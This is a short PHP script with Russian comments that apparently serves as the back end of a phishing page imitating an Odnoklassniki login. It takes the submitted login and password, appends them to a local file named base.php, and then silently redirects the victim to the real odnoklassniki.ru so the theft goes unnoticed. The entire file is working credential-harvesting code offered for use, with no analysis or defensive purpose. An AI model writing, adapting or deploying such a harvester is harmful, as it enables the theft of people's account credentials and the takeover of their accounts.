<?PHP
$Login = $_POST['login']; // Логин
$Pass = $_POST['passwd']; // Пароль

$log = fopen("base.php","a+"); //открываем файл базы
fwrite($log,"\n $Login:$Pass \n"); //записываем всё
fclose($log); //закрываем
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://www.odnoklassniki.ru'></head></html>"; // куда пошлем пользователя после того как он ввел данные!
?>